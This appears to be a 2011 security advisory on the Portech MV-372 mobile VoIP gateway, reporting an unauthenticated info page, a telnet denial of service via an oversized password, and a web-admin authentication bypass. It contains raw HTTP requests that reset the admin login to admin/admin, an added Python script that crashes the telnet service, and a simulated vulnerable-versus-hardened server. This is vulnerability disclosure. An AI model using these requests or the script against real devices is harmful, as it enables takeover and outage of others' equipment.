
Portech MV-372 Denial Of Service / Bypass

Posted Jul 4, 2011
Authored by Zsolt Imre

Portech MV-372 suffers from bypass, information disclosure, and denial of service vulnerabilities.

tags | exploit, denial of service, vulnerability, bypass, info disclosure
SHA-256 | fe74441412f01ba9f25f295d9fb618f22c3ae8d6714d665bf59bfe16788b2c36

Portech MV-372 Mobile VoIP Multiple Vulnerabilities

1. Description

Multiple vulnerabilities have been found in the Portech MV-372 Mobile VoIP
Gateway which allow an attacker to compromise the device and/or mount a
denial of service attack against its telnet service.
The 'Device details' section contains information about the affected system.
Earlier and later versions might also be vulnerable (not tested).

The vendor has been notified and is aware of the issues, but from their
reply it seems a hotfix/patch will take a while.

2. Device details

Mobile VoIP2 v9.092

Model Type: MV-372
Module Description: GSM:850/900/1800/1900MHz (SIM3x0)
Firmware Version: Mon Sep 6 13:11:30 2010.
Codec Version: Fri Mar 20 17:13:45 2009.
Contact Address: 150, Shiang-Shung N.Road., Taichung, Taiwan, R.O.C.
Tel: 886-4-23058000
Fax: 886-4-23022596
E-Mail: sales@portech.com.tw
Web Site: http://www.portech.com.tw.

3. Information disclosure

It is possible to access http://<device address>/info.htm without
authentication. This page reveals information about the device like model
type, module description, firmware and codec versions.

4. Telnet service remote denial of service vulnerability

It is possible to mount a denial of service attack against the telnet
service without authentication by supplying a very long password (e.g. more
than 5000 characters) at the login prompt. No valid username is required.
As a result, the telnet service crashes and stays unavailable until the
device is restarted.
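A reproduction and availability check for the telnet crash above, as an added example (not the advisory's own code). The advisory gives only the trigger, a password longer than 5000 characters with no valid username, so the login sequence used here (discard the banner and any option negotiation, send a username line, then the password line) and the 6000-byte size are assumptions; the before/after connection check shows whether the service actually died. Against an unpatched device this takes the telnet service down until a reboot.

```python
"""Trigger the MV-372 telnet crash described above and confirm the service is gone.

Added example, not code from the advisory. The prompt handling and the
6000-byte password length are assumptions; the advisory only reports that a
password longer than 5000 characters crashes the service.
"""
import socket
import sys

PASSWORD_LEN = 6000  # comfortably above the >5000 threshold reported


def oversized_login(username=b"x", password_len=PASSWORD_LEN):
    """Build the two lines a telnet client would type: any username, then the long password."""
    if password_len <= 5000:
        raise ValueError("the advisory reports the crash only for passwords longer than 5000 chars")
    return username + b"\r\n" + b"A" * password_len + b"\r\n"


def drain(sock, timeout=1.0):
    """Read and discard whatever the service sends first (banner, IAC negotiation, prompt)."""
    sock.settimeout(timeout)
    got = b""
    try:
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            got += chunk
    except socket.timeout:
        pass
    return got


def telnet_accepts(host, port=23, timeout=3.0):
    """True if the telnet service still accepts a TCP connection (False after a successful crash)."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def trigger(host, port=23, timeout=3.0):
    """Send the oversized login; returns the number of bytes written."""
    payload = oversized_login()
    with socket.create_connection((host, port), timeout=timeout) as s:
        drain(s, timeout)   # wait for the login prompt
        s.sendall(payload)
        drain(s, timeout)   # give the service a moment to process the password (or die)
    return len(payload)


def main(argv):
    host = argv[1]
    print("before:", "up" if telnet_accepts(host) else "down")
    print("sent", trigger(host), "bytes")
    print("after:", "up" if telnet_accepts(host) else "down (device restart required)")


if __name__ == "__main__":
    main(sys.argv)
```

Usage: `python3 mv372_telnet_dos.py <device address>`. The "after" line going from up to down is the confirmation the advisory describes; a patched build should stay up.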

5. Web Administration authentication bypass vulnerability

5.1 Description

An authentication bypass vulnerability exists in the web interface which
allows an attacker to modify the configuration of the device without
providing a valid username and password.
After a successful authentication the browser receives no cookie from the
device. After restarting the browser, deleting all stored data, or using
private browsing, the administrative pages are still accessible. Only after
changing our IP address are the pages no longer accessible and we are asked
to log in again. So the device stores the client IP address and uses it as
the session identifier. That is a weakness in itself (any client behind the
same address inherits the session), and, just as the application uses plain
HTTP instead of HTTPS for authentication, it also fails to validate the user
session properly.
The files with the '.htm' extension handle user interaction and display the
configuration settings, while the application uses CGI programs to carry out
the requested tasks such as configuration, username and password changes.
The '.htm' pages verify the client IP address but the CGI programs do not,
so calling a CGI directly with the proper arguments executes the requested
action without any authentication.

5.2 Proof of concept

To change the username and password of the device without authentication
send the following query to the device:

POST http://<device address>/change.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/change.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

Nuser=admin&Npass=admin&Nrpass=admin&submit=Submit

The query above changes the current username and password to 'admin'. To
apply the change the configuration has to be saved, which the query below
does. After it executes the device restarts and we can log in with the
username 'admin' and password 'admin'.

POST http://<device address>/save.cgi HTTP/1.1
Host: <device address>
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101
Firefox/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: hu-hu,hu;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-2,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://192.168.0.100/save.htm
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

submit=Save

All other CGIs are also vulnerable.
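A local model of sections 5.1 and 5.2, as an added example (not the device's firmware and not code from the advisory): a tiny HTTP admin interface in two variants. The vulnerable one records the client IP at login, checks it on the .htm pages and not at all in change.cgi/save.cgi, so the two PoC requests succeed with no login; the hardened one issues a random session token at login and checks it in one place before any CGI is dispatched. Paths and form fields are the advisory's; the /login route, its field names and the stored credentials are assumptions.

```python
"""Model of the web-administration bypass described above (added example, not the
device's firmware or the advisory's code). Vulnerable variant: login records the
client IP, .htm pages check that IP, .cgi actions check nothing. Hardened variant:
login issues a random session token, checked once before any route runs. Paths and
form fields are the advisory's; /login, its fields and the state are assumptions."""
import secrets
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.cookies import SimpleCookie
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

class DeviceState:  # constructed stand-in for the gateway's configuration store
    def __init__(self):
        self.username, self.password, self.saved = "operator", "s3cret", False
        self.ip_sessions = set()     # vulnerable: the client IP is the session
        self.token_sessions = set()  # hardened: a random token is the session

def make_handler(state, hardened):
    class Handler(BaseHTTPRequestHandler):
        def _reply(self, code, body, cookie=None):
            self.send_response(code)
            if cookie:
                self.send_header("Set-Cookie", f"sid={cookie}; HttpOnly")
            self.end_headers()
            self.wfile.write(body.encode())

        def _authenticated(self):
            if hardened:
                sid = SimpleCookie(self.headers.get("Cookie", "")).get("sid")
                return sid is not None and sid.value in state.token_sessions
            return self.client_address[0] in state.ip_sessions

        def do_GET(self):  # the .htm pages: gated in both variants
            ok = self._authenticated()
            self._reply(200 if ok else 401, f"user={state.username}" if ok else "login required")

        def do_POST(self):
            n = int(self.headers.get("Content-Length", 0))
            form = dict(urllib.parse.parse_qsl(self.rfile.read(n).decode()))
            if self.path == "/login":
                if (form.get("user"), form.get("pass")) != (state.username, state.password):
                    return self._reply(401, "bad credentials")
                # hardened: random token sent as a cookie; vulnerable: remember the client IP
                sid = secrets.token_hex(16) if hardened else None
                (state.token_sessions if hardened else state.ip_sessions).add(sid or self.client_address[0])
                return self._reply(200, "ok", cookie=sid)
            # Hardened: one authorization gate in front of every CGI. Vulnerable: none.
            if hardened and not self._authenticated():
                return self._reply(401, "login required")
            if self.path == "/change.cgi":
                state.username, state.password = form["Nuser"], form["Npass"]
                return self._reply(200, "changed")
            if self.path == "/save.cgi":
                state.saved = True
                return self._reply(200, "saved")
            self._reply(404, "no such cgi")
    return Handler

def start(hardened):
    state = DeviceState()
    srv = ThreadingHTTPServer(("127.0.0.1", 0), make_handler(state, hardened))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, state, f"http://127.0.0.1:{srv.server_address[1]}"

def post(base, path, fields, sid=None):
    """POST a form as the PoC does; returns (status, session cookie value or None)."""
    req = urllib.request.Request(base + path, data=urllib.parse.urlencode(fields).encode(), method="POST")
    if sid:
        req.add_header("Cookie", f"sid={sid}")
    try:
        with urllib.request.urlopen(req) as r:
            c = SimpleCookie(r.headers.get("Set-Cookie", "")).get("sid")
            return r.status, (c.value if c else None)
    except urllib.error.HTTPError as e:
        return e.code, None

def replay_poc(base, sid=None):
    """The advisory's two requests in order: change.cgi, then save.cgi."""
    s1, _ = post(base, "/change.cgi", {"Nuser": "admin", "Npass": "admin", "Nrpass": "admin", "submit": "Submit"}, sid)
    s2, _ = post(base, "/save.cgi", {"submit": "Save"}, sid)
    return s1, s2

def run(hardened):
    """Replay the PoC with no login; on the hardened variant, then log in and retry."""
    srv, state, base = start(hardened)
    try:
        result = {"unauth": replay_poc(base), "username": state.username, "saved": state.saved}
        if hardened:
            _, sid = post(base, "/login", {"user": "operator", "pass": "s3cret"})
            result["authed"] = replay_poc(base, sid)
            result["username_after_login"] = state.username
        return result
    finally:
        srv.shutdown()

if __name__ == "__main__":
    print("vulnerable:", run(False))
    print("hardened:", run(True))
```

Run it and the vulnerable variant reports both PoC requests accepted (200, 200) with the credentials changed to admin/admin and the configuration saved; the hardened variant answers 401 to both until a login has produced a token, after which the same requests succeed. The property a fix has to provide is that every handler that changes state sits behind the same gate, and that the client address is never that gate.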


Regards,
Zsolt Imre